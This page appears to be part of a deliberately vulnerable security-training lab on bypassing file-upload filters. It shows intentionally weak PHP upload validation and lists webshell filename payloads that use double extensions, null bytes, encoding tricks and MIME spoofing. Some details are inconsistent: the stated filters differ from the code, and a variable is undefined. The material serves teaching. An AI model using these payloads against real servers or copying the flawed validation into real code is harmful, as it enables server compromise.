Lab 2: File Upload with Filter Bypass

File upload with security filters that can be bypassed

Difficulty: Medium

Lab Overview

This lab demonstrates file upload vulnerabilities where basic security filters are implemented but can be bypassed using various techniques. The application filters file types and MIME types but doesn't prevent all attack vectors.

Objective: Bypass security filters to upload malicious files and achieve server compromise.

Vulnerable Code with Filters 
// Vulnerable: Basic filters that can be bypassed
function process_file_upload_with_filters($file) {
    $allowed_extensions = ['jpg', 'jpeg', 'png', 'gif', 'txt', 'pdf'];
    $allowed_mime_types = ['image/jpeg', 'image/png', 'image/gif', 'text/plain'];
    $max_file_size = 5 * 1024 * 1024; // 5MB
    
    // Check file size
    if ($file['size'] > $max_file_size) {
        return false;
    }
    
    // Check extension
    $file_extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($file_extension, $allowed_extensions)) {
        return false;
    }
    
    // Check MIME type
    if (!in_array($file['type'], $allowed_mime_types)) {
        return false;
    }
    
    // Still vulnerable to bypass techniques
    return move_uploaded_file($file['tmp_name'], $file_path);
}
Filtered File Upload
Active Filters

The following are filtered:

  • Extensions: jpg, jpeg, png, gif, txt, pdf, doc, docx
  • MIME Types: image/jpeg, image/png, image/gif, text/plain, application/pdf, application/msword, application/vnd.openxmlformats-officedocument.wordprocessingml.document
  • File Size: Maximum 5MB
Bypass Techniques

Try these bypass methods:

  • webshell.php.jpg - Double extension
  • webshell.php%00.jpg - Null byte injection
  • webshell.php;.jpg - Semicolon bypass
  • webshell.php.jpg - Case variation
Uploaded Files

No files uploaded yet.

Vulnerability Details
  • Type: File Upload with Filter Bypass
  • Severity: High
  • Method: POST
  • Issue: Inadequate security filters
Bypass Techniques
  • Double Extension: Use multiple extensions
  • Null Byte: Inject null bytes
  • Case Variation: Use different cases
  • Special Characters: Use semicolons, spaces
File Upload Filter Bypass Payloads

Use these techniques to bypass security filters:

1. Double Extension Bypass:
webshell.php.jpg webshell.php.png webshell.php.gif webshell.php.txt webshell.php.pdf
2. Null Byte Injection Bypass:
webshell.php%00.jpg webshell.php%00.png webshell.php%00.gif webshell.php%00.txt webshell.php%00.pdf
3. Semicolon Bypass:
webshell.php;.jpg webshell.php;.png webshell.php;.gif webshell.php;.txt webshell.php;.pdf
4. Case Variation Bypass:
webshell.PHP webshell.Php webshell.pHp webshell.php webshell.PHP.JPG
5. Space Bypass:
webshell.php .jpg webshell.php .png webshell.php .gif webshell.php .txt webshell.php .pdf
6. Dot Bypass:
webshell.php. webshell.php... webshell.php....jpg webshell.php.....png
7. Slash Bypass:
webshell.php/ webshell.php// webshell.php/../.jpg webshell.php/../../.png
8. Backslash Bypass:
webshell.php\ webshell.php\\ webshell.php\..\.jpg webshell.php\..\..\.png
9. URL Encoding Bypass:
webshell.php%2e%6a%70%67 webshell.php%2e%70%6e%67 webshell.php%2e%67%69%66 webshell.php%2e%74%78%74
10. Unicode Bypass:
webshell.php%u002e%u006a%u0070%u0067 webshell.php%u002e%u0070%u006e%u0067 webshell.php%u002e%u0067%u0069%u0066 webshell.php%u002e%u0074%u0078%u0074
11. MIME Type Bypass:
# Upload with image MIME type Content-Type: image/jpeg # But file content is PHP code